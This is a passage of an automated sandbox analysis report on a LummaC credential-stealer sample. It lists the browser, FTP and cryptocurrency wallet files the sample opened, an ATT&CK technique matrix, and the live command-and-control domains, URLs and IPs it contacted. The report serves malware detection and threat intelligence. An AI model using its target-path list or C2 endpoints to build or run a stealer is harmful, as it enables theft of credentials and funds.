Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Directory queried: C:\Users\user\Documents\NWTVCDUMOB	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	13 File and Directory Discovery	Remote Services	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	12 Process Injection	11 Deobfuscate/Decode Files or Information	11 Input Capture	227 System Information Discovery	Remote Desktop Protocol	31 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	1051 Security Software Discovery	SMB/Windows Admin Shares	11 Input Capture	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	Login Hook	12 Software Packing	NTDS	13 Process Discovery	Distributed Component Object Model	1 Clipboard Data	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	461 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	111 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	461 Virtualization/Sandbox Evasion	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
vUcZzNWkKc.exe	47%	ReversingLabs
vUcZzNWkKc.exe	31%	Virustotal		Browse
vUcZzNWkKc.exe	100%	Avira	HEUR/AGEN.1313526
vUcZzNWkKc.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\768400\Climb.com	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\PasoCattle.exe	11%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Set-up.exe	70%	ReversingLabs	Win32.Trojan.Amadey

Source	Detection	Scanner	Label
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP173521000335a1	100%	Avira URL Cloud	malware
http://home.fortth14ht.top/nTrms	100%	Avira URL Cloud	malware
http://home.fortth14ht.top/nTrm	100%	Avira URL Cloud	malware
https://spuriotis.click/api	0%	Avira URL Cloud	safe
spuriotis.click	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
spuriotis.click	172.67.128.184	true	true	unknown
home.fortth14ht.top	194.87.58.92	true	false	high
httpbin.org	3.218.7.103	true	false	high
yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
scentniej.buzz	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003?argument=0	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003	false		high
hummskitnj.buzz	false		high
rebuildeso.buzz	false		high
appliacnesot.buzz	false		high
screwamusresz.buzz	false		high
cashfuzysao.buzz	false		high
inherineau.buzz	false		high
https://spuriotis.click/api	true	Avira URL Cloud: safe	unknown
https://httpbin.org/ip	false		high
prisonyfork.buzz	false		high
spuriotis.click	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://html4/loose.dtd	vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://duckduckgo.com/chrome_newtab	Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP173521000335a1	Set-up.exe, 00000002.00000003.1983744365.00000000008D2000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	Climb.com, 0000000D.00000003.2216406997.0000000003C7C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003http://home.fortth14ht.top/nTrmoVgOaovBJpKS	Set-up.exe, 00000002.00000002.1985706274.00000000012E9000.00000004.00000001.01000000.00000008.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	Climb.com, 0000000D.00000003.2167581088.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167509243.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://.css	vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://www.autoitscript.com/autoit3/	Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.dr	false		high
https://curl.se/docs/hsts.html	Set-up.exe.0.dr	false		high
http://home.fortth14ht.top/nTrms	Set-up.exe, 00000002.00000003.1984043815.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985183549.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1983744365.00000000008D2000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	Climb.com, 0000000D.00000003.2216406997.0000000003C7C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	Climb.com, 0000000D.00000003.2167581088.0000000001485000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://home.fortth14ht.top/nTrm	Set-up.exe, Set-up.exe, 00000002.00000003.1984043815.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985183549.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000002.00000003.1983744365.00000000008D2000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://support.mozilla.org/products/firefoxgro.all	Climb.com, 0000000D.00000003.2214922982.0000000005A57000.00000004.00000800.00020000.00000000.sdmp	false		high
http://.jpg	vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://sectigo.com/CPS0	vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	false		high
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	Climb.com, 0000000D.00000003.2216406997.0000000003C7C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://curl.se/docs/http-cookies.html	vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP13	Set-up.exe.0.dr	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	Climb.com, 0000000D.00000003.2216406997.0000000003C7C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/X	Climb.com, 0000000D.00000000.1778645855.0000000000AF5000.00000002.00000001.01000000.0000000A.sdmp, Climb.com, 0000000D.00000003.1924401119.000000000452C000.00000004.00000800.00020000.00000000.sdmp, Fingers.10.dr, Climb.com.3.dr	false		high
http://ocsp.rootca1.amazontrust.com0:	Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	Climb.com, 0000000D.00000003.2167581088.00000000014AA000.00000004.00000020.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167509243.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe, 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe, 00000001.00000000.1712224288.0000000000409000.00000002.00000001.01000000.00000007.sdmp, PasoCattle.exe.0.dr	false		high
https://curl.se/docs/alt-svc.html	Set-up.exe.0.dr	false		high
https://www.ecosia.org/newtab/	Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Climb.com, 0000000D.00000003.2214922982.0000000005A57000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	false		high
https://httpbin.org/ipbefore	vUcZzNWkKc.exe, 00000000.00000002.1763459410.00000000072E4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000002.00000002.1985722353.00000000012EB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	false		high
https://www.amazon.com/?tag	Climb.com, 0000000D.00000003.2239939802.0000000003C79000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	Climb.com, 0000000D.00000003.2216406997.0000000003C7C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	vUcZzNWkKc.exe, 00000000.00000002.1763459410.0000000006565000.00000004.00000800.00020000.00000000.sdmp, PasoCattle.exe.0.dr	false		high
https://support.microsof	Climb.com, 0000000D.00000003.2167509243.0000000003DBF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Climb.com, 0000000D.00000003.2213807089.0000000001491000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	Climb.com, 0000000D.00000003.2167581088.0000000001485000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Climb.com, 0000000D.00000003.2167197496.0000000003C90000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167074960.0000000003DBA000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.128.184	spuriotis.click	United States	13335	CLOUDFLARENETUS	true
194.87.58.92	home.fortth14ht.top	Russian Federation	2118	RELCOM-ASRelcomGroup19022019RU	false
3.218.7.103	httpbin.org	United States	14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581585
Start date and time:	2024-12-28 09:32:18 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	vUcZzNWkKc.exe renamed because original name is a hash value
Original Sample Name:	2882ead03a58608f2f73c66b861299a3.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@28/23@10/3
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Set-up.exe, PID 7744 because there are no executed function
Execution Graph export aborted for target vUcZzNWkKc.exe, PID 7504 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:33:13	API Interceptor	1x Sleep call for process: PasoCattle.exe modified
03:33:20	API Interceptor	9x Sleep call for process: Climb.com modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.128.184	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse
194.87.58.92	CLaYpUL3zw.exe	Get hash	malicious	LummaC	Browse	home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP1735210003
